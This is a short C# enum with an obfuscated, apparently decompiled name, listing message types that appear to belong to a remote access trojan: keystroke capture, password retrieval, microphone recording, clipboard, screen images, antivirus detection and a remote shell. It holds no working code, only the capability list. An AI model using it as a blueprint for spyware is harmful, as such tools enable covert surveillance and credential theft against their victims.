public enum GEnum0
{
	ImageType,
	NotificationType,
	ClientTag,
	ProcessType,
	InformationType,
	FilesListType,
	CurrentDirectoryType,
	DirectoryUpType,
	FileType,
	ClipboardType,
	HardwareUsageType,
	KeystrokeType,
	CurrentWindowType,
	MicrophoneRecordingType,
	AntiVirusTag,
	WindowsVersionTag,
	MessageType,
	PasswordType,
	RemoteShellType
}
